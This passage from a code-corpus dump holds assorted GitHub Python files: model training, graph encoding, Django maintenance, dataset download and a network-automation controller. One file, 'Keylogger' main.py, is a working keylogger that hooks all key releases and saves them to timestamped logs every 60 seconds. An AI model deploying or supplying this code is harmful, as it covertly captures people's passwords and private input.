max_epochs=args.max_epochs)\n\nprint(model)\nmodel_summary = ModelSummary(model)\n\nif not args.no_wandb:\n wandb_logger.log_hyperparams({\n \"total_parameters\": model_summary.total_parameters,\n \"trainable_parameters\": model_summary.trainable_parameters,\n \"dataset_size\": len(dataset)})\n\ntrainer.fit(model, train_loader, test_loader)\n", "repo_name": "louixp/latent-actions", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "latent_actions.cvae.DECODER_CLASS.keys", "line_number": 16, "usage_type": "call"}, {"api_name": "latent_actions.cvae.DECODER_CLASS", "line_number": 16, "usage_type": "attribute"}, {"api_name": "latent_actions.cvae", "line_number": 16, "usage_type": "name"}, {"api_name": "latent_actions.data.dataset.EpisodicDataset.load", "line_number": 25, "usage_type": "call"}, {"api_name": "latent_actions.data.dataset.EpisodicDataset", "line_number": 25, "usage_type": "name"}, {"api_name": "latent_actions.data.dataset.DemonstrationDataset.add_dataset_specific_args", "line_number": 26, "usage_type": "call"}, {"api_name": "latent_actions.data.dataset.DemonstrationDataset", "line_number": 26, "usage_type": "name"}, {"api_name": "latent_actions.data.dataset.DemonstrationDataset", "line_number": 28, "usage_type": "call"}, {"api_name": "latent_actions.cvae.DECODER_CLASS", "line_number": 30, "usage_type": "attribute"}, {"api_name": "latent_actions.cvae", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 37, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 48, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 53, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.model_summary.ModelSummary", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "11028000520", "text": "import networkx as nx\nimport numpy as np\n\ndef bfs_seq(G, start_id):\n '''\n get a bfs node sequence\n :param G:\n :param start_id:\n :return:\n '''\n dictionary = dict(nx.bfs_successors(G, start_id))\n start = [start_id]\n output = [start_id]\n while len(start) > 0:\n next = []\n while len(start) > 0:\n current = start.pop(0)\n neighbor = dictionary.get(current)\n if neighbor is not None:\n #### a wrong example, should not permute here!\n # shuffle(neighbor)\n next = next + neighbor\n output = output + next\n start = next\n return output\n\n\n\ndef encode_adj(adj, max_prev_node=10, is_full = False):\n '''\n\n :param adj: n*n, rows means time step, while columns are input dimension\n :param max_degree: we want to keep row number, but truncate column numbers\n :return: n*M(max_prev_node)\n '''\n if is_full:\n max_prev_node = adj.shape[0]-1\n\n # pick up lower tri\n adj = np.tril(adj, k=-1)\n n = adj.shape[0]\n adj = adj[1:n, 0:n-1]\n\n # use max_prev_node to truncate\n # note: now adj is a (n-1)*(n-1) matrix\n adj_output = np.zeros((adj.shape[0], max_prev_node))\n for i in range(adj.shape[0]):\n input_start = max(0, i - max_prev_node + 1)\n input_end = i + 1\n output_start = max_prev_node + input_start - input_end\n output_end = max_prev_node\n adj_output[i, output_start:output_end] = adj[i, input_start:input_end]\n adj_output[i,:] = adj_output[i,:][::-1] # reverse order\n\n return adj_output\n\ndef decode_adj(adj_output):\n '''\n recover to adj from adj_output\n note: here adj_output have shape (n-1)*m\n '''\n max_prev_node = adj_output.shape[1]\n adj = np.zeros((adj_output.shape[0], adj_output.shape[0]))\n for i in range(adj_output.shape[0]):\n input_start = max(0, i - max_prev_node + 1)\n input_end = i + 1\n output_start = max_prev_node + max(0, i - max_prev_node + 1) - (i + 1)\n output_end = max_prev_node\n adj[i, input_start:input_end] = adj_output[i,::-1][output_start:output_end] # reverse order\n adj_full = np.zeros((adj_output.shape[0]+1, adj_output.shape[0]+1))\n n = adj_full.shape[0]\n adj_full[1:n, 0:n-1] = np.tril(adj, 0)\n adj_full = adj_full + adj_full.T\n\n return adj_full\n\n\ndef encode_adj_flexible(adj):\n '''\n return a flexible length of output\n note that here there is no loss when encoding/decoding an adj matrix\n :param adj: adj matrix\n :return: not a matrix, but a list of adj vectors.\n '''\n # pick up lower tri\n adj = np.tril(adj, k=-1)\n n = adj.shape[0]\n adj = adj[1:n, 0:n-1]\n\n adj_output = []\n input_start = 0\n for i in range(adj.shape[0]):\n input_end = i + 1\n adj_slice = adj[i, input_start:input_end]\n adj_output.append(adj_slice)\n non_zero = np.nonzero(adj_slice)[0]\n input_start = input_end-len(adj_slice)+np.amin(non_zero)\n\n return adj_output\n\n\ndef decode_adj_flexible(adj_output):\n '''\n return a flexible length of output\n note that here there is no loss when encoding/decoding an adj matrix\n :param adj: adj matrix\n :return:\n '''\n adj = np.zeros((len(adj_output), len(adj_output)))\n for i in range(len(adj_output)):\n output_start = i+1-len(adj_output[i])\n output_end = i+1\n adj[i, output_start:output_end] = adj_output[i]\n adj_full = np.zeros((len(adj_output)+1, len(adj_output)+1))\n n = adj_full.shape[0]\n adj_full[1:n, 0:n-1] = np.tril(adj, 0)\n adj_full = adj_full + adj_full.T\n\n return adj_full", "repo_name": "johnding1996/UMD-CMSC726-Project", "sub_path": "utils/graph_ops.py", "file_name": "graph_ops.py", "file_ext": "py", "file_size_in_byte": 3641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "networkx.bfs_successors", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.tril", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.tril", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.tril", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.tril", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "28037414080", "text": "import datetime\nimport logging\nimport os\n\nfrom django.core.management.base import BaseCommand\nfrom main.models import State\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = \"Deletes any states marked for deletion with null project, type, or version.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--min_age_days\",\n type=int,\n default=int(os.getenv(\"EXPIRATION_AGE_DAYS\", 30)),\n help=\"Minimum age in days of state objects for deletion.\",\n )\n\n def handle(self, **options):\n BATCH_SIZE = 1000\n num_deleted = 0\n min_delta = datetime.timedelta(days=options[\"min_age_days\"])\n max_datetime = datetime.datetime.now(datetime.timezone.utc) - min_delta\n while True:\n # We cannot delete with a LIMIT query, so make a separate query\n # using IDs.\n deleted = State.objects.filter(deleted=True, modified_datetime__lte=max_datetime)\n null_project = State.objects.filter(\n project__isnull=True, modified_datetime__lte=max_datetime\n )\n null_type = State.objects.filter(type__isnull=True, modified_datetime__lte=max_datetime)\n null_version = State.objects.filter(\n version__isnull=True, modified_datetime__lte=max_datetime\n )\n null_media = State.objects.filter(\n media__isnull=True, modified_datetime__lte=max_datetime\n )\n state_ids = (\n (deleted | null_project | null_type | null_version | null_media)\n .distinct()\n .values_list(\"pk\", flat=True)[:BATCH_SIZE]\n )\n states = State.objects.filter(pk__in=state_ids)\n num_states = states.count()\n if num_states == 0:\n break\n states.delete()\n num_deleted += num_states\n logger.info(f\"Deleted a total of {num_deleted} states...\")\n logger.info(f\"Deleted a total of {num_deleted} states!\")\n", "repo_name": "cvisionai/tator", "sub_path": "api/main/management/commands/prunestates.py", "file_name": "prunestates.py", "file_ext": "py", "file_size_in_byte": 2064, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 11, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 26, "usage_type": "attribute"}, {"api_name": "main.models.State.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 30, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 31, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 34, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 34, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 35, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 38, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 46, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "23300996403", "text": "import os\nimport sys\nimport json\ntry:\n from html import escape # py3\nexcept ImportError:\n from cgi import escape # py2\n\ndef usage():\n print(\"USAGE: firefox_recovery_to_html.py /path/to/profile_dir/sessionstore-backups/recovery.js\")\n\nif len(sys.argv) < 1:\n usage()\n raise SystemExit(1)\n\nfpath = sys.argv[1]\n\nif fpath == '--help' or fpath == '-h':\n usage()\n raise SystemExit()\n\nif not os.path.exists(fpath):\n raise SystemExit(\"ERROR: file does not exist: %s\" % fpath)\n\nwith open(fpath, 'r') as fh:\n raw = fh.read()\n\njs = json.loads(raw)\n\n\"\"\"\n_closedWindows\nwindows\nsession\nselectedWindow\nglobal\n\"\"\"\n\nprint('')\nprint('recovery.js tabs')\nprint('
      ')\nfor i in js['windows']:\n for x in i['tabs']:\n tab = x['entries'][-1]\n print('
    1. {title}
    2. '.format(title=tab['title'], url=escape(tab['url'])))\nprint('
    ')\n", "repo_name": "jantman/misc-scripts", "sub_path": "firefox_recovery_to_html.py", "file_name": "firefox_recovery_to_html.py", "file_ext": "py", "file_size_in_byte": 1157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 133, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "cgi.escape", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "5081080505", "text": "import numpy as np\nimport tensorflow as tf\nimport autokeras as ak\n\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\n\ndatasets = load_breast_cancer()\nx = datasets.data\ny = datasets.target\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=66, shuffle=True)\n\nprint(x_train.shape, x_test. shape) \nprint(y_train.shape, y_test.shape) \n\nscale = MinMaxScaler()\nscale.fit(x_train)\nx_train = scale.transform(x_train)\nx_test = scale.transform(x_test)\n\n\n#ImageRegressor는 shape가 맞지않음\nmodel = ak.StructuredDataClassifier(\n overwrite=True,\n max_trials=2,\n #loss='mse',\n #metrics=['acc']\n)\n\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n\nes= EarlyStopping(monitor='val_loss',mode='min', patience=6)\nlr = ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=2)\nck = ModelCheckpoint('C:/data/modelcheckpoint/', save_best_only=True, save_weights_only=True, monitor='val_loss', verbose=1)\n\n\nmodel.fit(x_train, y_train, epochs=10, validation_split=0.2, callbacks=[es, lr, ck])\n\nresults = model.evaluate(x_test, y_test)\nprint(results) \n\nmodel2 = model.export_model()\ntry:\n model2.save('C:/data/save/cancer', save_format='tf')\nexcept:\n model2.save('C:/data/save/cancer.h5')\n\n# 4/4 [==============================] - 0s 4ms/step - loss: 0.0745 - accuracy: 0.9737\n# [0.07452034205198288, 0.9736841917037964]", "repo_name": "jsja22/study", "sub_path": "keras3/keras108_cancer.py", "file_name": "keras108_cancer.py", "file_ext": "py", "file_size_in_byte": 1563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_breast_cancer", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 19, "usage_type": "call"}, {"api_name": "autokeras.StructuredDataClassifier", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.EarlyStopping", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ReduceLROnPlateau", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "73773987046", "text": "# Author - Puneet\r\n# Downloading dataset, creating directories, extracting and deleting\r\nimport requests\r\nfrom zipfile import ZipFile \r\nimport os\r\n\r\ntemp_Directory = \"/tmp/data/\"\r\nparent_Directory = os.getcwd()\r\ndataset_url = 'https://cvml.ist.ac.at/AwA2/AwA2-data.zip'\r\nfile_name = 'AwA2-data.zip'\r\n\r\n#This API is used to create a temporary directory in the /tmp/ folder in linux\r\n#This way the dataset is automatically deleted upon restart\r\ndef createDirectory():\r\n\r\n file_name = 'AwA2-data.zip'\r\n check_data_path = temp_Directory+file_name\r\n #Check if the dataset is available in the given path above\r\n if os.path.isfile(check_data_path):\r\n print(\"Dataset \" + check_data_path + \" already exists!\\n\")\r\n return True\r\n #If not, create the folder\r\n else:\r\n print(\"Dataset \" +check_data_path+ \" does not exist. Checking if folder exists...\\n\")\r\n #check if the directory has been created. Ignore if it has already been created\r\n if(os.path.isdir(temp_Directory)):\r\n print(\"Path already exists. No need to create directory\\n\")\r\n return False\r\n else:\r\n #Create the directory\r\n print(\"Path\" + temp_Directory + \"does not exist. Creating now... \\n\")\r\n try:\r\n os.makedirs(temp_Directory)\r\n except OSError:\r\n print (\"Creation of the directory %s failed : \\n\" % temp_Directory)\r\n else:\r\n print (\"Successfully created the directory %s: \\n\" % temp_Directory)\r\n return False\r\n \r\n#This API is use to download the dataset\r\n#IF the dataset already exists, there is no need to actually download the dataset\r\ndef DloadDataset():\r\n data_file = temp_Directory+file_name\r\n print(\"Downloading dataset from source. Path: \"+data_file+\"\\n\\n\")\r\n r = requests.get(dataset_url, allow_redirects = True)\r\n #Downloading the file to the path created in createDirectory()\r\n \r\n with open(data_file, 'wb') as file: \r\n file.write(r.content)\r\n\r\n print(\"Dataset files downloaded from source.. \\n\\n\")\r\n \r\ndef unzipDataset():\r\n zip_dir = temp_Directory+file_name\r\n with ZipFile(zip_dir, 'r') as zip:\r\n for member in zip.namelist():\r\n checkdir = temp_Directory+member\r\n if os.path.exists(checkdir) or os.path.isfile(checkdir):\r\n print (\"Error \",member,\" exists\")\r\n else:\r\n zip.extract(member, path=temp_Directory)\r\n print(\"Extracting\", member,\"here\")\r\n\r\ndef deleteDirectory():\r\n deleteDirectory = \"/temp_test\"\r\n delete_Directory_Path = os.getcwd() + deleteDirectory\r\n deletePath = delete_Directory_Path\r\n try:\r\n os.remove(deleteDirectory)\r\n except OSError:\r\n print (\"Deletion of the directory %s failed :\\n\" % deleteDirectory)\r\n else:\r\n print (\"Successfully deleted the directory %s : \\n\" % deleteDirectory)\r\n \r\ndef main(): \r\n '''temp_Directory = \"/temp_test/data/\"\r\n parent_Directory = os.getcwd()\r\n \r\n dataset_url = 'https://cvml.ist.ac.at/AwA2/AwA2-base.zip'\r\n file_name = dataset_url.split('/')[-1]\r\n '''\r\n print(\"Downloading and Preparing Dataset for Zero Shot Leaning .. ..\\n\\n\")\r\n \r\n if not createDirectory():\r\n DloadDataset()\r\n \r\n unzipDataset()\r\n #deleteDirectory()\r\n\r\nif __name__ == \"__main__\": \r\n main() ", "repo_name": "aranganath/zslearning", "sub_path": "prepare_dataset.py", "file_name": "prepare_dataset.py", "file_ext": "py", "file_size_in_byte": 3374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 66, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "8632434474", "text": "import keyboard\nfrom datetime import datetime\nfrom threading import Timer\n\nSAVE_REPORT_INTERVAL = 60 # seconds\n\nclass Keylogger:\n def __init__(self, interval):\n self.interval = interval\n self.log = \"\"\n self.start_dt = datetime.now()\n self.end_dt = datetime.now()\n \n def callback(self, event):\n \"\"\"\n Called whenever a keyboard event occurs\n \"\"\"\n name = event.name\n if len(name) > 1:\n if name == \"space\":\n name = \" \"\n elif name == \"enter\":\n name = \"[ENTER]\\n\"\n elif name == \"decimal\":\n name = \".\"\n else:\n name = f'[{name.upper()}]'\n\n self.log += name\n\n def update_filename(self):\n start_dt_str = str(self.start_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\n end_dt_str = str(self.end_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\n self.filename = f\"keylog-{start_dt_str}_{end_dt_str}\"\n \n def report_to_file(self):\n with open(f'./logs/{self.filename}.txt', 'w') as f:\n # Write the keylogs to the file\n print(self.log, file=f)\n print(f'Saved most recent keylogs to: {self.filename}.txt')\n\n def report(self):\n if self.log:\n self.end_dt = datetime.now()\n self.update_filename()\n self.report_to_file()\n self.start_dt = datetime.now()\n self.log = ''\n timer = Timer(interval=self.interval, function=self.report)\n timer.daemon = True\n timer.start()\n\n def start(self):\n self.start_dt = datetime.now()\n keyboard.on_release(callback=self.callback)\n self.report()\n keyboard.wait()\n\nif __name__ == '__main__':\n keylogger = Keylogger(interval=SAVE_REPORT_INTERVAL)\n keylogger.start()", "repo_name": "JackWinterburn/Keylogger", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}, {"api_name": "threading.Timer", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 54, "usage_type": "name"}, {"api_name": "keyboard.on_release", "line_number": 55, "usage_type": "call"}, {"api_name": "keyboard.wait", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "36047626139", "text": "import numpy as np\nimport bpy\n\ncortexAndCerebellumStr = \"out\" # This is the name of the cortex + cerebellum object\noutput_full_path = '/media/ohadfel/Elements/Abeles/blender_lookup_table.npy'\n\ntotal_num_of_verts = len(bpy.data.objects[cortexAndCerebellumStr].data.vertices)\nlookup_table = np.ones((total_num_of_verts, 20), dtype=np.int)*-1\nlast_inds = np.zeros((total_num_of_verts, 1), dtype=np.int)\n\nmesh = bpy.data.objects['out'].data\nfor poly in mesh.polygons:\n for loop_index in poly.loop_indices:\n loop_vert_index = mesh.loops[loop_index].vertex_index\n lookup_table[loop_vert_index, last_inds[loop_vert_index]] = loop_index\n last_inds[loop_vert_index] += 1\nprint('FINISH!!!')\nnp.save(output_full_path, lookup_table)\n", "repo_name": "ohadfel/Blender-Abeles-Lab", "sub_path": "create_vert_face_lookup_table.py", "file_name": "create_vert_face_lookup_table.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bpy.data", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 9, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "21160881000", "text": "import pygame\nimport moderngl\n\nclass Texture:\n def __init__(self, ctx) -> None:\n self.ctx = ctx\n self.textures = {}\n self.textures[0] = self.get_texture(path='./textures/test.png')\n self.textures[1] = self.get_texture(path='./textures/img1.png')\n self.textures[2] = self.get_texture(path='./textures/img2.png')\n self.textures[3] = self.get_texture(path='./textures/img3.png')\n\n\n def get_texture(self, path):\n texture = pygame.image.load(path).convert()\n texture = pygame.transform.flip(texture, flip_x=False, flip_y=True)\n texture = self.ctx.texture(size=texture.get_size(),\n components = 3,\n data = pygame.image.tostring(texture, 'RGB'))\n \n texture.filter = (moderngl.LINEAR_MIPMAP_LINEAR, moderngl.LINEAR)\n texture.build_mipmaps()\n \n return texture\n \n def destroy(self):\n [tex.release for tex in self.textures.values()]\n", "repo_name": "MrBlueBlobGuy/Blue-Engine", "sub_path": "blueEngine/texture.py", "file_name": "texture.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.image.load", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.tostring", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "moderngl.LINEAR_MIPMAP_LINEAR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "moderngl.LINEAR", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "37884349976", "text": "from collections import Counter, defaultdict\nfrom contextlib import redirect_stdout\nfrom datetime import datetime\nfrom difflib import unified_diff\nfrom dramatiq import actor\nfrom flask_login import current_user\nfrom functools import wraps\nfrom git import Repo\nfrom io import BytesIO, StringIO\nfrom ipaddress import IPv4Network\nfrom json import dump, load\nfrom logging import info\nfrom operator import attrgetter, itemgetter\nfrom os import getenv, listdir, makedirs, scandir\nfrom os.path import exists\nfrom pathlib import Path\nfrom re import search, sub\nfrom requests import get as http_get\nfrom ruamel import yaml\nfrom shutil import rmtree\nfrom sqlalchemy import and_, cast, or_, String\nfrom sqlalchemy.exc import IntegrityError, OperationalError\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy.sql.expression import true\nfrom subprocess import Popen\nfrom tarfile import open as open_tar\nfrom threading import current_thread, Thread\nfrom traceback import format_exc\nfrom uuid import uuid4\nfrom xlrd import open_workbook\nfrom xlrd.biffh import XLRDError\nfrom xlwt import Workbook\n\nfrom eNMS.database import db\nfrom eNMS.forms import form_factory\nfrom eNMS.environment import env\nfrom eNMS.variables import vs\n\n\nclass Controller:\n def _initialize(self, first_init):\n if not first_init:\n return\n self.migration_import(\n name=vs.settings[\"app\"].get(\"startup_migration\", \"default\"),\n import_export_types=db.import_export_models,\n )\n self.get_git_content(force_update=True)\n self.scan_folder()\n\n def _register_endpoint(self, func):\n setattr(self, func.__name__, func)\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n def add_edge(self, workflow_id, subtype, source, destination):\n workflow = db.fetch(\"workflow\", id=workflow_id, rbac=\"edit\")\n workflow_edge = self.update(\n \"workflow_edge\",\n rbac=None,\n **{\n \"name\": vs.get_time(),\n \"workflow\": workflow_id,\n \"subtype\": subtype,\n \"source\": source,\n \"destination\": destination,\n },\n )\n workflow.update_last_modified_properties()\n db.session.commit()\n return {\"update_time\": workflow.last_modified, **workflow_edge}\n\n def add_instances_in_bulk(self, **kwargs):\n target = db.fetch(kwargs[\"relation_type\"], id=kwargs[\"relation_id\"])\n if target.type == \"pool\" and not target.manually_defined:\n return {\"alert\": \"Adding objects to a dynamic pool is not allowed.\"}\n model, property = kwargs[\"model\"], kwargs[\"property\"]\n instances = set(db.objectify(model, kwargs[\"instances\"]))\n if kwargs[\"names\"]:\n for name in [instance.strip() for instance in kwargs[\"names\"].split(\",\")]:\n instance = db.fetch(model, allow_none=True, name=name)\n if not instance:\n return {\"alert\": f\"{model.capitalize()} '{name}' does not exist.\"}\n instances.add(instance)\n instances = instances - set(getattr(target, property))\n for instance in instances:\n getattr(target, property).append(instance)\n target.last_modified = vs.get_time()\n target.last_modified_by = current_user.name\n return {\"number\": len(instances), \"target\": target.base_properties}\n\n def add_objects_to_network(self, network_id, **kwargs):\n network = db.fetch(\"network\", id=network_id)\n result = {\"nodes\": [], \"links\": []}\n nodes = set(db.objectify(\"node\", kwargs[\"nodes\"]))\n links = set(db.objectify(\"link\", kwargs[\"links\"]))\n for pool in db.objectify(\"pool\", kwargs[\"pools\"]):\n nodes |= set(pool.devices)\n links |= set(pool.links)\n if kwargs[\"add_connected_nodes\"]:\n for link in links:\n nodes |= {link.source, link.destination}\n if kwargs[\"add_connected_links\"]:\n for node in nodes:\n links |= set(node.get_neighbors(\"link\"))\n for node in nodes:\n if not node or node in network.nodes or node == network:\n continue\n result[\"nodes\"].append(node.serialized)\n network.nodes.append(node)\n for link in links:\n if link in network.links:\n continue\n if (\n link.source not in network.nodes\n or link.destination not in network.nodes\n ):\n continue\n result[\"links\"].append(link.serialized)\n network.links.append(link)\n return result\n\n def bulk_deletion(self, table, **kwargs):\n instances = self.filtering(table, properties=[\"id\"], **kwargs)\n for instance in instances:\n db.delete(table, id=instance.id)\n return len(instances)\n\n def bulk_edit(self, table, **kwargs):\n instances = kwargs.pop(\"id\").split(\"-\")\n for instance_id in instances:\n instance = db.factory(table, id=instance_id)\n for property, value in kwargs.items():\n if not kwargs.get(f\"bulk-edit-{property}\"):\n continue\n edit_mode = kwargs.get(f\"{property}-edit-mode\")\n if not edit_mode:\n setattr(instance, property, value)\n else:\n current_value = getattr(instance, property)\n related_model = vs.relationships[table][property][\"model\"]\n objects = db.objectify(related_model, value)\n if edit_mode == \"set\":\n setattr(instance, property, objects)\n else:\n for obj in objects:\n if edit_mode == \"append\" and obj not in current_value:\n current_value.append(obj)\n elif edit_mode == \"remove\" and obj in current_value:\n current_value.remove(obj)\n return len(instances)\n\n def bulk_removal(\n self,\n table,\n target_type,\n target_id,\n target_property,\n **kwargs,\n ):\n target = db.fetch(target_type, id=target_id)\n if target.type == \"pool\" and not target.manually_defined:\n return {\"alert\": \"Removing objects from a dynamic pool is an allowed.\"}\n instances = self.filtering(table, bulk=\"object\", **kwargs)\n for instance in instances:\n getattr(target, target_property).remove(instance)\n return len(instances)\n\n def calendar_init(self, type):\n results, properties = {}, [\"id\", \"name\", \"runtime\", \"service_properties\"]\n for instance in db.fetch_all(type):\n if getattr(instance, \"workflow\", None):\n continue\n date = getattr(instance, \"next_run_time\" if type == \"task\" else \"runtime\")\n python_month = search(r\".*-(\\d{2})-.*\", date)\n if not python_month:\n continue\n month = \"{:02}\".format((int(python_month.group(1)) - 1) % 12)\n start = [\n int(i)\n for i in sub(\n r\"(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+).*\",\n r\"\\1,\" + month + r\",\\3,\\4,\\5\",\n date,\n ).split(\",\")\n ]\n instance_properties = instance.get_properties(include=properties)\n results[instance.name] = {\"start\": start, 